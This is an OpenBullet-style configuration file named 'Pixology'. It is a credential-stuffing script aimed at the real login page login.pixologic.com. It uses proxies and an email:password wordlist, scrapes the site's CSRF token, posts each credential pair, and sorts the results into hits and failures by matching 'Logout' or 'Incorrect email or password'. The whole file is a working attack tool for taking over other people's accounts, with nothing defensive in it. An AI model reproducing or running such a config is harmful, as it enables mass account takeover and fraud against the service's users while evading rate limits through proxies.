[SETTINGS]
{
  "Name": "Pixology",
  "SuggestedBots": 1,
  "LastModified": "2018-05-14T19:03:03.5796179+00:00",
  "AdditionalInfo": "",
  "Author": "MisterNoOne",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://login.pixologic.com/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://login.pixologic.com/login" 
  HEADER "Origin: https://login.pixologic.com" 
#GrabbingToken PARSE "<SOURCE>" LR "=\"csrf-token\" content=\"" "\">" Recursive=FALSE -> VAR "Token" "" "" 
REQUEST POST "https://login.pixologic.com/login" AutoRedirect=TRUE 
  CONTENT "_csrflogin=<Token>&LoginForm%5Bemail%5D=<USER>&LoginForm%5Bpassword%5D=<PASS>&LoginForm%5BrememberMe%5D=0&login-button=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Incorrect email or password" 
  KEYCHAIN Success OR 
    KEY "Logout" 
